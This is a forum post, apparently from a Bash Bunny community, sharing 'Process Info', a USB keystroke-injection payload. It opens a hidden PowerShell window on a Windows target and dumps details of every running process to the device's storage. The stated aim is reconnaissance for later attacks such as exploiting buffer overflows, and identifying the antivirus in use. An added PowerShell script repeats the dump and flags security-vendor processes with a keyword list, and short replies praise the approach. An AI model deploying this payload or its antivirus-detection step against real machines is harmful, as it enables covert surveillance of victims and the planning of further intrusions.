
[PAYLOAD] Process Info


Decoy


This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system. An example of useful process info:

Name                       : avpui
Id                         : 724
PriorityClass              : Normal
FileVersion                : 17.0.0.643
Path                       : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe
Company                    : AO Kaspersky Lab
CPU                        : 85.875
ProductVersion             : 17.0.0.643
Description                : Kaspersky Anti-Virus
Product                    : Kaspersky Anti-Virus

https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo

#!/bin/bash
#
# Title:         Process Info
# Author:        Decoy
# Version:       1.0
# Category:      Recon
# Target:        Windows XP SP3+ (Powershell)
# Attackmodes:   HID, Storage
# 
# 
# Amber Blink Fast.....Initialization
# Amber................Begin
# White Blinking.......Moving loot to mass storage
# Blue Blinking........Syncing File System
# Green................Finished

# Initialization
LED R G 100

# Create loot directory
mkdir -p /root/udisk/loot/ProcessInfo

# Runs a hidden PowerShell that gathers process information for potential future attack vectors
LED R G
ATTACKMODE HID STORAGE
QUACK DELAY 6000
# Open the Run dialog and launch PowerShell with no profile, non-interactive, hidden window
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUACK DELAY 1000
# Find the Bunny's mass-storage partition by its volume label, then dump every property of
# every process visible to the current user into the loot directory created above and exit
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED R G B 100
sleep 1

# Sync File System
LED B 100
sync; sleep 1; sync

# Trap is clean
LED G


Edited by Decoy
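The same recon step the payload types through QUACK, written as a stand-alone PowerShell script so it can be tried on a Windows test box before it goes on the device. This is an added example and not part of Decoy's payload; the volume label 'BashBunny', the loot sub-path 'loot\ProcessInfo' and the vendor keyword list used for the AV triage at the end are assumptions made here for illustration.

```powershell
# Added example, not the payload's own code. Assumptions (not from the original post):
# the volume label, the loot sub-path and the vendor keyword list below.
param(
    [string]$VolumeLabel = 'BashBunny',        # assumption: label the payload filters on
    [string]$LootSubPath = 'loot\ProcessInfo'  # assumption: matches the payload's mkdir
)

# Locate the Bunny's mass-storage partition by volume label. Get-CimInstance is the
# current replacement for gwmi; -Filter takes a WQL clause, so the label is single-quoted.
$vol = Get-CimInstance -ClassName Win32_Volume -Filter "Label='$VolumeLabel'" |
       Select-Object -First 1
if ($vol) {
    $lootDir = Join-Path $vol.DriveLetter $LootSubPath
} else {
    # No device attached: fall back to the working directory so the script still
    # produces output when run from an ordinary shell during testing.
    $lootDir = Join-Path (Get-Location) $LootSubPath
}
New-Item -ItemType Directory -Path $lootDir -Force | Out-Null

# Collect the fields shown in the post's sample output. Path, FileVersion, Company,
# Description and Product are read from the process's main module, which is only
# accessible for processes running at the same or lower integrity as the current user;
# for SYSTEM, other-user or elevated processes these stay empty unless the shell is elevated.
$procs = Get-Process |
         Select-Object Name, Id, PriorityClass, Path, FileVersion, ProductVersion,
                       Company, Description, Product, CPU

# Keep the full text dump the payload produces, plus a CSV that is easier to grep/sort.
$procs | Format-List -Property * | Out-File -FilePath (Join-Path $lootDir 'ProcessInfo.txt')
$procs | Export-Csv -Path (Join-Path $lootDir 'ProcessInfo.csv') -NoTypeInformation

# Quick AV triage: flag processes whose name or module metadata names a security vendor.
# The keyword list is an assumption for illustration; extend it for the targets you see.
# 'MsMpEng'/'Antimalware' cover Windows Defender, whose Company field is just Microsoft.
$vendorKeywords = @('Kaspersky', 'MsMpEng', 'Antimalware', 'McAfee', 'Symantec', 'Sophos',
                    'ESET', 'Bitdefender', 'Trend Micro', 'CrowdStrike', 'SentinelOne',
                    'Malwarebytes')
$pattern = ($vendorKeywords | ForEach-Object { [regex]::Escape($_) }) -join '|'

$av = $procs | Where-Object {
    # -match on an array returns the matching elements; an empty result is $false
    ($_.Name, $_.Company, $_.Description, $_.Product) -match $pattern
}
$av | Select-Object Name, Id, Company, Product, Path |
      Export-Csv -Path (Join-Path $lootDir 'SecurityProducts.csv') -NoTypeInformation
$av | Format-Table Name, Id, Company, Product -AutoSize
```

Run it once from a non-elevated PowerShell on a lab machine and compare with an elevated run: the processes whose Path and Company come back empty in the first run are exactly the ones running above the current user's integrity level, which is useful context on its own when the loot is reviewed later.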

6 hours ago, Dave-ee Jones said:

Simple but effective.

Utilising simple powershell commands and functions is definitely one of the best things about Ducky script...

Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn, and extremely effective.

